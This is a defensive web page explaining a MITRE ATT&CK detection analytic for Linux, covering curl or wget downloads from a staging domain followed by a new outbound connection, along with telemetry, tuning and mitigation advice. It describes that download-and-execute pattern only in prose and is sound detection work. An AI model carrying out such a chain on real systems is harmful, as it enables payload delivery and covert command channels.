AN0638: Analytic 0638
Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.
Analyst context for executives and security teams
This analytic describes a Linux post-download execution pattern: a script or binary retrieves content with curl or wget from a staging domain, writes it to disk or memory, and soon after starts another process that makes an outbound connection to a different destination. For leaders, the value is in validating whether security teams can connect download activity, process launch, and network egress into one investigation story rather than reviewing each event in isolation.
Executive priority
Prioritize this as a control-validation and SOC-readiness question for Linux environments: can the organization prove it sees command-line download tools, file or memory write behavior, child process creation, and follow-on outbound connections? This matters for incident triage, containment decisions, audit evidence around monitoring coverage, and reducing blind spots on servers or workloads where Linux telemetry is often thinner than endpoint telemetry on user devices.
Technical view
SOC and detection teams should validate correlation on Linux between shell scripts or binaries invoking curl or wget, output being written to disk or memory, and a shortly following process establishing a new outbound connection to a different IP or hostname. Because ATT&CK supplies no tactic mapping, no detection logic, and no relationships, teams should treat this as a behavior pattern to operationalize locally rather than a complete rule. Key engineering work is defining the time window, parent-child process linkage, command-line capture quality, destination-change logic, and approved administrative or automation use cases that may create false positives.
Likely telemetry
- Linux process execution events with parent-child relationships
- Command-line arguments showing curl or wget usage
- File creation or write events where available
- Memory execution or in-memory load indicators where available
- Outbound network connection metadata from host, EDR, firewall, proxy, DNS, or network sensors
Detection direction
- Confirm Linux endpoints or servers actually collect process command lines and parent-child process relationships; without this, the analytic loses much of its value.
- Correlate curl/wget download activity with subsequent process launch and new outbound connection to a different IP or hostname within a defined short time window.
- Tune for legitimate software deployment, patching, backup, monitoring, CI/CD, and administrative scripts that commonly use curl or wget.
- Validate visibility for both disk writes and cases where output may be handled in memory, noting that memory-level evidence may not be consistently available.
- Use destination context to separate expected repositories, package mirrors, and internal services from unusual staging domains or unexpected egress paths.
Mitigation priorities
- Inventory where Linux systems are allowed to use curl or wget and where outbound internet access is business-justified.
- Restrict unnecessary egress from Linux servers and workloads using network controls appropriate to the environment.
- Standardize approved software retrieval and deployment paths so exceptions are easier to detect.
- Improve Linux endpoint and network telemetry before relying on this analytic for incident response decisions.
- Document expected administrative automation patterns to support SOC tuning and compliance evidence.
Analyst notes and limits
The supplied object is an ATT&CK detection analytic, not a technique, and it has no relationship context or tactic assignment. Its defensive value is strongest as a correlation pattern across Linux process, file or memory write, and outbound network telemetry. Local baselining is important because curl and wget are common legitimate tools.
Official detection content is not provided, and no related techniques, groups, campaigns, mitigations, or data components were supplied. This take does not infer attribution, active exploitation, impact, or guaranteed detection coverage. Applicability is limited to the supplied platform: Linux.
Analytic 0638
Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 3726b58b7403… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0638Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.